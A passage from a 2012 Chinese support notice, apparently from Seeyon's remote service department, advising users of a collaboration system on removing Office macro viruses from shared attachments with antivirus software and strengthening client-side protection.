能直接上外网客户端安装360杀毒，不能上外网客户端可以在其他能上网地方下载360客户端版再进行安装杀毒。

2、收集协同中有宏病毒的协同，发起人撤销协同，从待发事项中将协
同彻底删除；或者将有病毒协同附件下载本地后使用360杀毒软件或附件中office宏病毒杀毒软件杀毒，杀毒后的文件再重新上传协同中，以保证其他人不会下载再中毒。

3、对于协同系统文档附件，协同系统就是一个管道，我们只是一个沟
通协作的工具，要彻底的长效预防，需要在每一个客户端的杀毒软件能够查杀病毒，健壮客户端自身防毒能力。

北京致远软件远程服务部
2012-6-15。